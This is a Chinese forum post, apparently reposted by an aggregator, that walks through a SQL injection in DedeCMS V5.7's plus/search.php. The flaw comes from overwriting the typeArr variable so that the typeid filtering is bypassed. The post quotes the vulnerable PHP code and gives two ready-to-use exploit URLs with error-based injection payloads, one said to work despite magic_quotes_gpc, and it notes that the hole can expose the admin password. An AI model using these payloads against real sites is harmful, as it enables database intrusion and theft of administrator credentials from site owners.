微博上看到就分析了一下,這個漏洞不止一處地方可以被利用.其實可以無視magic_quotes_gpc = On的時候.真心不雞肋.

Hackme論壇原創 轉載請附帶原文鏈接

作者: c4rp3nt3r@0x50sec.org

Dedecms最新版 plus/search.php 文件存在變量覆蓋漏洞,成功利用該漏洞可以獲取管理員密碼.

算了不公開了,不能糟蹋0day了.

傳送門? DedeCmS V57 plus/search.php 文件SQL注射0day漏洞

黑哥說漏洞已補.怪我沒有測試好.也沒用這個黑站…不過這個漏洞真心不錯,應該有一定利用價值.標題就不改了,補了就公開了吧.

============

Hackme論壇原創 轉載請附帶原文鏈接

作者: c4rp3nt3r@0x50sec.org

Dedecms最新版 plus/search.php 文件存在變量覆蓋漏洞,成功利用該漏洞可以獲取管理員密碼.

require_once(dirname(__FILE__).”/../include/common.inc.php”);

require_once(DEDEINC.”/arc.searchview.class.php”);

$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;

$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;

$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;

$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;

$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;

if(!isset($orderby)) $orderby=”;

else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);

if(!isset($searchtype)) $searchtype = ‘titlekeyword’;

else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);

if(!isset($keyword)){

if(!isset($q)) $q = ”;

$keyword=$q;

}

$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));

//查找欄目信息

if(empty($typeid))

{

$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;

if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )

{

$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);

fwrite($fp, “

$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);

$dsql->Execute();

while($row = $dsql->GetArray())

{

fwrite($fp, “/$typeArr[{$row['id']}] = ‘{$row['typename']}’;/r/n”);

}

fwrite($fp, ‘?’.’>’);

fclose($fp);

}

//引入欄目緩存并看關鍵字是否有相關欄目內容

require_once($typenameCacheFile);

//$typeArr這個數組是包含生成的臨時文件 里面定義的,由于dedecms的全局變量機制,我們可以自己定義一個

//

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

$keywordn = str_replace($typename, ‘ ‘, $keyword);??//這個地方要繞過

if($keyword != $keywordn)

{

$keyword = $keywordn;

$typeid = $id; // 這里存在變量覆蓋漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 這句過濾成了擺設

break;

}

}

}

}

然后plus/search.php文件下面定義了一個 Search類的對象 .

在arc.searchview.class.php 文件的SearchView類的構造函數 聲明了一個TypeLink類.

$this->TypeLink = new TypeLink($typeid);

TypeLink類的構造函數沒有經過過濾,(程序員以為前面已經過濾過了

… )直接帶入了sql語句.

class TypeLink

{

var $typeDir;

var $dsql;

var $TypeID;

var $baseDir;

var $modDir;

var $indexUrl;

var $indexName;

var $TypeInfos;

var $SplitSymbol;

var $valuePosition;

var $valuePositionName;

var $OptionArrayList;

//構造函數///

//php5構造函數

function __construct($typeid)

{

$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];

$this->indexName = $GLOBALS['cfg_indexname'];

$this->baseDir = $GLOBALS['cfg_basedir'];

$this->modDir = $GLOBALS['cfg_templets_dir'];

$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];

$this->dsql = $GLOBALS['dsql'];

$this->TypeID = $typeid;

$this->valuePosition = ”;

$this->valuePositionName = ”;

$this->typeDir = ”;

$this->OptionArrayList = ”;

//載入類目信息

$query = “SELECT tp.*,ch.typename as

ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join

`#@__channeltype` ch

on ch.id=tp.channeltype??WHERE tp.id=’$typeid’ “; //注射漏洞發生在這里,很明顯需要magic_quotes_gpc = Off 雞肋了嗎?好可以吧至少不需要會員中心阿

if($typeid > 0)

{

$this->TypeInfos = $this->dsql->GetOne($query);

利用代碼一 需要 即使magic_quotes_gpc = Off

本帖隱藏的內容

http://www.hackme.info/plus/search.php?typeArr[2%27%20and%20@%60/%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title

這只是其中一個利用代碼… Search 類的構造函數再往下

……省略

$this->TypeID = $typeid;

……省略

if($this->TypeID==”0″){

$this->ChannelTypeid=1;

}else{

$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //這里的注入漏洞無視magic_quotes_gpc = On的存在哦親

//現在不雞肋了吧親…

$this->ChannelTypeid=$row['channeltype'];

}

利用代碼二,下面這個EXP 即使magic_quotes_gpc = On 也可以成功利用.

本帖隱藏的內容

http://www.hackme.info/plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title

如果那個數據庫里存在內容,就要考慮的復雜點了.我也沒考慮那么周全,分析了下然后簡單測試了下,也沒用來黑站.

該文章由WP-AutoPost插件自動采集發布

總結

以上是生活随笔為你收集整理的织梦dedecms search.php注入漏洞exp,DedeCms V57 plus/search.php 文件SQL注射0day漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。